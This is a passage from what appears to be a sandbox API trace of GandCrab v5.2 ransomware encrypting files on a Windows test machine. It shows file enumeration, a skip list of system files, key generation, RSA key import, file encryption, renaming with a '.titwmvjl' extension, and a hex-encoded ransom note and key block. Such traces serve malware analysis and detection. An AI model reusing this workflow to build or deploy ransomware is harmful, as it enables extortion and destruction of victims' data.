x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0092.157] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0092.158] CloseHandle (hObject=0x230) returned 1 [0092.158] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.159] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.159] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x25, wMilliseconds=0x1db)) [0092.159] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.159] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.159] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.159] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0092.162] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.162] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.162] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\") returned 32 [0092.162] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*" [0092.162] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503778 [0092.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.162] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.163] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.163] lstrcmpW (lpString1="Bing.url", lpString2=".") returned 1 [0092.163] lstrcmpW (lpString1="Bing.url", lpString2="..") returned 1 [0092.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="Bing.url" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" [0092.163] lstrlenW (lpString=".titwmvjl") returned 9 [0092.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.163] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.164] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url.titwmvjl") returned 49 [0092.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.164] lstrlenW (lpString=".url") returned 4 [0092.164] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.164] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".url ") returned 5 [0092.164] lstrcmpiW (lpString1=".url", lpString2=".titwmvjl") returned 1 [0092.164] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.164] lstrcmpiW (lpString1="Bing.url", lpString2="desktop.ini") returned -1 [0092.164] lstrcmpiW (lpString1="Bing.url", lpString2="autorun.inf") returned 1 [0092.164] lstrcmpiW (lpString1="Bing.url", lpString2="ntuser.dat") returned -1 [0092.164] lstrcmpiW (lpString1="Bing.url", lpString2="iconcache.db") returned -1 [0092.164] lstrcmpiW (lpString1="Bing.url", lpString2="bootsect.bak") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="boot.ini") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="ntuser.dat.log") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="thumbs.db") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="KRAB-DECRYPT.html") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="CRAB-DECRYPT.html") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="ntldr") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="NTDETECT.COM") returned -1 [0092.165] lstrcmpiW (lpString1="Bing.url", lpString2="Bootfont.bin") returned -1 [0092.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.165] lstrlenW (lpString=".url") returned 4 [0092.165] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.165] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".url ") returned 5 [0092.165] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.165] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.166] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.166] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0092.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.166] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.167] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.167] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.167] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.167] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.167] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.167] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.168] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.168] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.168] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.168] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.168] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.169] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.169] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.169] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.169] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0092.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.170] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.170] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.170] GetLastError () returned 0x0 [0092.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.170] CryptDestroyKey (hKey=0x5035b8) returned 1 [0092.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.170] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.171] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.171] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0092.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.171] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.172] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.172] GetLastError () returned 0x0 [0092.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.172] CryptDestroyKey (hKey=0x5032f8) returned 1 [0092.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.172] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.172] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.172] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.173] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xd0, lpOverlapped=0x0) returned 1 [0092.187] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.187] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xd0, lpOverlapped=0x0) returned 1 [0092.268] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.268] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.344] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.348] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.348] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.348] CloseHandle (hObject=0x2ac) returned 1 [0092.349] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url.titwmvjl"), dwFlags=0x1) returned 1 [0092.350] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.350] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.350] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.350] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.350] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock" [0092.350] lstrlenW (lpString=".titwmvjl") returned 9 [0092.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.350] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.350] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 65 [0092.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.350] lstrlenW (lpString=".lock") returned 5 [0092.350] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.350] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.350] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.351] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.351] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.351] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.351] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.351] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini" [0092.351] lstrlenW (lpString=".titwmvjl") returned 9 [0092.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.351] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.351] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini.titwmvjl") returned 52 [0092.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.351] lstrlenW (lpString=".ini") returned 4 [0092.351] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.351] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0092.351] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0092.351] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.352] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.352] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.352] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.352] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0092.352] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0092.352] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links" [0092.352] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\" [0092.352] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.352] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.353] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.353] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.353] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\\\TITWMVJL-DECRYPT.txt") returned 59 [0092.353] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\links\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0092.354] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\